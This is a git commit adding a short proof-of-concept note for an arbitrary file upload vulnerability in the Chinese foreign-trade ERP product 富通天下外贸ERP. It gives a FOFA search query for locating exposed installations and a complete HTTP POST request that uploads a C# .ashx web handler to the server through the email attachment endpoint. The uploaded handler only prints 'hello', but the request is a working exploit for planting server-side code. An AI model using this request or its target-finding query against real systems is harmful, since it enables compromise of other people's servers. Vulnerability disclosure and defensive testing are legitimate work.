Create 富通天下外贸ERP任意文件上传漏洞.md

2025-02-27 04:39:25 +00:00 · 2024-04-17 20:04:08 +08:00 · 2024-04-17 20:04:08 +08:00 · 47dec303b7
commit 47dec303b7
parent 1f03943f1f
1 changed files with 27 additions and 0 deletions
--- a/富通天下外贸ERP任意文件上传漏洞.md
+++ b/富通天下外贸ERP任意文件上传漏洞.md
@ -0,0 +1,27 @@
+## 富通天下外贸ERP任意文件上传漏洞
+
+## fofa
+```
+title="用户登录_富通天下外贸ERP"
+```
+
+## poc
+```
+POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+ 
+<% @ webhandler language="C#" class="AverageHandler" %>
+using System;
+using System.Web;
+public class AverageHandler : IHttpHandler
+{
+public bool IsReusable
+{ get { return true; } }
+public void ProcessRequest(HttpContext ctx)
+{
+ctx.Response.Write("hello");
+}
+}
+```